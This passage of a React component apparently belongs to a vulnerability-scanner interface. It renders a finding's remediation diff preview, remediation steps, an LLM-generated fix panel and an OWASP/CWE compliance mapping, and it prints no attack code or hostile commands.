      
      {/* Remediation Diff Preview */}
      {diffPairs.length > 0 && (
        <div className="border rounded-lg overflow-hidden" data-testid="diff-preview-section">
          <button 
            className="w-full p-3 flex items-center justify-between bg-gradient-to-r from-red-50 to-green-50 hover:from-red-100 hover:to-green-100 transition"
            onClick={() => toggleSection('diffPreview')}
            data-testid="diff-preview-toggle"
          >
            <div className="flex items-center gap-2">
              <ArrowRight className="w-4 h-4 text-indigo-600" />
              <span className="font-medium text-gray-800">Remediation Diff Preview</span>
              <Badge variant="outline" className="text-[10px] px-1.5 py-0 border-indigo-300 text-indigo-600">
                Vulnerable → Secure
              </Badge>
            </div>
            {expandedSections.diffPreview ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
          </button>
          {expandedSections.diffPreview && (
            <div className="p-4">
              <DiffPreview pairs={diffPairs} />
            </div>
          )}
        </div>
      )}

      {/* Remediation Steps */}
      <div className="border rounded-lg overflow-hidden">
        <button 
          className="w-full p-3 flex items-center justify-between bg-green-50 hover:bg-green-100 transition"
          onClick={() => toggleSection('remediation')}
        >
          <div className="flex items-center gap-2">
            <Wrench className="w-4 h-4 text-green-600" />
            <span className="font-medium text-green-800">Remediation Steps</span>
          </div>
          {expandedSections.remediation ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
        </button>
        {expandedSections.remediation && (
          <div className="p-4 space-y-4">
            {remediationSteps.map((step, idx) => (
              <div key={idx} className="space-y-2">
                <div className="flex items-center gap-2">
                  <div className="w-6 h-6 rounded-full bg-green-100 flex items-center justify-center">
                    <span className="text-green-700 text-sm font-medium">{idx + 1}</span>
                  </div>
                  <h4 className="font-medium text-green-800">{step.title}</h4>
                </div>
                <p className="text-sm text-gray-600 ml-8">{step.description}</p>
                {step.code && (
                  <div className="ml-8">
                    <CodeBlock code={step.code} language={step.language} title="Code Example" />
                  </div>
                )}
              </div>
            ))}

            {/* AI-generated fix — separate panel because it can be async
                and shows a diff/snippet block on top of the deterministic
                steps above. */}
            <div className="mt-4 pt-4 border-t border-green-100">
              <div className="flex items-start justify-between gap-3">
                <div>
                  <h4 className="font-medium text-indigo-800 flex items-center gap-1">
                    <Zap className="w-4 h-4" /> AI-generated fix
                  </h4>
                  <p className="text-xs text-gray-600 mt-0.5">
                    Uses your configured LLM (Settings &gt; AI Configuration) to
                    produce a drop-in code patch tailored to this finding.
                  </p>
                </div>
                {scanId && finding?.id && (
                  <button
                    type="button"
                    onClick={runAIFix}
                    disabled={aiFixLoading}
                    data-testid="ai-fix-generate-btn"
                    className={`text-xs font-medium px-3 py-1.5 rounded border transition ${
                      aiFixLoading
                        ? 'bg-slate-100 text-slate-500 cursor-not-allowed border-slate-200'
                        : 'bg-indigo-600 text-white border-indigo-600 hover:bg-indigo-700'
                    }`}
                  >
                    {aiFixLoading
                      ? 'Generating…'
                      : aiFix
                      ? 'Regenerate fix'
                      : 'Get AI-generated fix'}
                  </button>
                )}
              </div>

              {aiFixError && (
                <div className="mt-2 text-xs text-rose-700 bg-rose-50 border border-rose-200 rounded p-2" data-testid="ai-fix-error">
                  {aiFixError}
                </div>
              )}

              {aiFix && (
                <div className="mt-3 space-y-3" data-testid="ai-fix-result">
                  {aiFix.explanation && (
                    <p className="text-sm text-slate-700 bg-indigo-50 border border-indigo-100 rounded p-2">
                      <span className="font-semibold text-indigo-800">Why this fix works: </span>
                      {aiFix.explanation}
                    </p>
                  )}
                  {aiFix.diff && (
                    <div>
                      <div className="text-xs text-slate-500 mb-1">Suggested patch (unified diff)</div>
                      <CodeBlock code={aiFix.diff} language="diff" title="Diff" />
                    </div>
                  )}
                  {!aiFix.diff && aiFix.fixed_snippet && (
                    <div>
                      <div className="text-xs text-slate-500 mb-1">Fixed code</div>
                      <CodeBlock code={aiFix.fixed_snippet} language={aiFix.language || 'code'} title="Suggested Fix" />
                    </div>
                  )}
                  {(aiFix.ai_provider || aiFix.ai_model) && (
                    <div className="text-[10px] text-slate-400">
                      Generated by <code>{aiFix.ai_provider}</code>
                      {aiFix.ai_model ? ` / ${aiFix.ai_model}` : ''}
                      {aiFix.generated_at ? ` · ${new Date(aiFix.generated_at).toLocaleString()}` : ''}
                    </div>
                  )}
                </div>
              )}
            </div>
          </div>
        )}
      </div>
      
      {/* Compliance Framework Mapping */}
      <div className="border rounded-lg overflow-hidden">
        <button 
          className="w-full p-3 flex items-center justify-between bg-purple-50 hover:bg-purple-100 transition"
          onClick={() => toggleSection('compliance')}
        >
          <div className="flex items-center gap-2">
            <BookOpen className="w-4 h-4 text-purple-600" />
            <span className="font-medium text-purple-800">Compliance Framework Mapping</span>
          </div>
          {expandedSections.compliance ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
        </button>
        {expandedSections.compliance && (
          <div className="p-4">
            <div className="grid grid-cols-1 gap-2">
              {complianceMapping.map((mapping, idx) => (
                <div key={idx} className="flex items-center justify-between p-2 bg-gray-50 rounded">
                  <div className="flex items-center gap-2">
                    <Badge variant="outline" className={
                      mapping.framework === 'OWASP' ? 'border-red-300 text-red-700' :
                      mapping.framework === 'CWE' ? 'border-orange-300 text-orange-700' :
                      'border-blue-300 text-blue-700'
                    }>
                      {mapping.framework}
                    </Badge>
                    <span className="text-sm font-mono text-gray-600">{mapping.id}</span>
                  </div>
                  <span className="text-sm text-gray-700">{mapping.name}</span>
                </div>
              ))}
            </div>
          </div>
        )}
      </div>
    </div>
  );
};

export default EnhancedFindingDetail;
